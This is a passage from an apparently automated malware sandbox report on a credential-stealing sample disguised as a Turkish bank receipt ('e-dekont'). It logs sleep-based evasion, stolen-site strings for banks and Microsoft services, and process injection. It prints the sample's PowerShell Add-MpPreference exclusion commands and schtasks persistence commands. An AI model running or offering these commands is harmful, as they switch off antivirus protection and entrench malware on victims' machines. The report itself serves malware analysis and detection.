                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -596531s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -596422s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -596313s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -596188s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -596079s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -595954s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -595829s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -595704s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -595579s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -595454s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -595329s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -595204s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -595079s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -594709s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -594580s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -594454s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -594329s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -594204s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -594079s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -593954s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -593829s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -593704s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -593579s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -593339s >= -30000s
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe TID: 7796Thread sleep time: -593219s >= -30000s
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Windows\System32\conhost.exeLast function: Thread delayed
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 600000Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 599875Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 599766Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 599641Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 599531Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 599422Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 599311Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 599203Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 599094Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 598985Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 598860Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 598639Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 598516Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 598407Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 598282Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 598157Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 598032Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 597922Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 597813Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 597688Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 597563Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 597438Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 597297Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 597188Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 597063Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 596938Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 596813Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 596688Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 596578Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 596465Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 596324Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 596094Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 595891Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 595780Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 595672Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 595562Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 595454Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 595329Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 595204Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 595079Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 594954Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 594829Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 594704Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 594579Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 594454Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 594329Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 594204Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 594079Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 593954Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 593829Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 593704Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 593579Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeThread delayed: delay time: 593454Jump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 922337203685477Jump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 922337203685477
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 600000
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 599422
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 599313
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 599188
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 599078
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 598969
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 598844
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 598735
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 598610
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 598485
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 598360
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 598235
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 598110
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 597985
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 597860
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 597735
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 597610
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 597485
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 597360
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 597235
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 597110
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 596985
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 596858
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 596750
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 596641
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 596531
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 596422
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 596313
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 596188
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 596079
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 595954
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 595829
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 595704
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 595579
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 595454
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 595329
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 595204
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 595079
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 594709
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 594580
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 594454
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 594329
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 594204
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 594079
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 593954
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 593829
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 593704
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 593579
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 593339
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeThread delayed: delay time: 593219
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - GDCDYNVMware20,11696492231p
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU WestVMware20,11696492231n
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231}
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.co.inVMware20,11696492231d
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: netportal.hdfcbank.comVMware20,11696492231
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office.comVMware20,11696492231s
                Source: e-dekont_html.exe, 0000000A.00000002.3787902586.0000000001656000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllIn1
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - non-EU EuropeVMware20,11696492231
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: AMC password management pageVMware20,11696492231
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: interactivebrokers.comVMware20,11696492231
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: microsoft.visualstudio.comVMware20,11696492231x
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - COM.HKVMware20,11696492231
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231^
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Test URL for global passwords blocklistVMware20,11696492231
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: outlook.office365.comVMware20,11696492231t
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - NDCDYNVMware20,11696492231z
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: discord.comVMware20,11696492231f
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3787673676.0000000000BB0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: global block list test formVMware20,11696492231
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: dev.azure.comVMware20,11696492231j
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.comVMware20,11696492231}
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: www.interactivebrokers.co.inVMware20,11696492231~
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: bankofamerica.comVMware20,11696492231x
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: trackpan.utiitsl.comVMware20,11696492231h
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: tasks.office.comVMware20,11696492231o
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: account.microsoft.com/profileVMware20,11696492231u
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Change Transaction PasswordVMware20,11696492231
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - EU East & CentralVMware20,11696492231
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ms.portal.azure.comVMware20,11696492231
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: turbotax.intuit.comVMware20,11696492231t
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: secure.bankofamerica.comVMware20,11696492231|UE
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Canara Transaction PasswordVMware20,11696492231x
                Source: HvgRSvNGGXnNtV.exe, 00000010.00000002.3798023061.0000000003C45000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Interactive Brokers - HKVMware20,11696492231]
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess information queried: ProcessInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeCode function: 10_2_06E59548 LdrInitializeThunk,LdrInitializeThunk,10_2_06E59548
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess token adjusted: DebugJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory allocated: page read and write | page guardJump to behavior

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, COVID19.csReference to suspicious API methods: MapVirtualKey(VKCode, 0u)
                Source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, FFDecryptor.csReference to suspicious API methods: Marshal.GetDelegateForFunctionPointer(GetProcAddress(hModule, method), typeof(T))
                Source: 0.2.e-dekont_html.exe.439af38.1.raw.unpack, FFDecryptor.csReference to suspicious API methods: hModuleList.Add(LoadLibrary(text21 + "\\mozglue.dll"))
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe"
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe"
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe"Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe"Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeMemory written: C:\Users\user\Desktop\e-dekont_html.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeMemory written: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\e-dekont_html.exe"Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe"Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpE95B.tmp"Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeProcess created: C:\Users\user\Desktop\e-dekont_html.exe "C:\Users\user\Desktop\e-dekont_html.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeProcess created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\HvgRSvNGGXnNtV" /XML "C:\Users\user\AppData\Local\Temp\tmpFE1C.tmp"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeProcess created: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe "C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe"Jump to behavior
                Source: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exeProcess created: C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe "C:\Users\user\AppData\Roaming\HvgRSvNGGXnNtV.exe"Jump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Users\user\Desktop\e-dekont_html.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\e-dekont_html.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
